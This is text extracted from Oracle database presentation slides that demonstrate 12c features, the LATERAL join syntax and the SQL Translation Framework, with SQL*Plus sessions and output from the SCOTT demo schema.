Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
ENAME
---------CLARK
KING
MILLER
Insert Information Protection Policy Classification from Slide 13
Expanded Syntax
ops$tkyte%ORA12CR1> select d.deptno, d.dname, e2.ename
2
from dept d, lateral (select ename
3
from emp e
4
where e.deptno = d.deptno) e2
5
where d.deptno in ( 10, 40 )
6
order by 1, 2
7 /
DEPTNO
---------10
10
10
82
DNAME
-------------ACCOUNTING
ACCOUNTING
ACCOUNTING
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
ENAME
---------CLARK
MILLER
KING
Insert Information Protection Policy Classification from Slide 13
#12 SQL
‘Esperanto’
83
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
SQL Translation Framework
 Migrations – without changing SQL
 Translations for
 Sybase
 MS SQLServer
 Partial DB2
 Or, do it yourself
84
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
SQL Translation Framework
ops$tkyte%ORA12CR1> begin
2
dbms_sql_translator.create_profile( 'MY_PROFILE' );
3
dbms_sql_translator.register_sql_translation
4
( 'MY_PROFILE',
5
'select * from scott.emp',
6
'select * from scott.dept' );
7 end;
8 /
PL/SQL procedure successfully completed.
85
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
SQL Translation Framework
ops$tkyte%ORA12CR1> alter session set
sql_translation_profile = MY_PROFILE;
Session altered.
ops$tkyte%ORA12CR1> alter session set events =
'10601 trace name context forever, level 32';
Session altered.
86
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 13
SQL Translation Framework
ops$tkyte%ORA12CR1> select * from scott.emp;
DEPTNO
---------10
20
30
40
87
DNAME
-------------ACCOUNTING
RESEARCH
SALES
OPERATIONS
Copyright © 2012, Oracle and/or its affiliates. All rights reserved.
LOC
------------NEW YORK
DALLAS
CHICAGO
BOSTON
Insert Information Protection Policy Classification from Slide 13
Graphic Section Divider
88
Copyright © 2013, Oracle and/or its affiliates. All rights reserved.
Insert Information Protection Policy Classification from Slide 12 of the corporate presentation template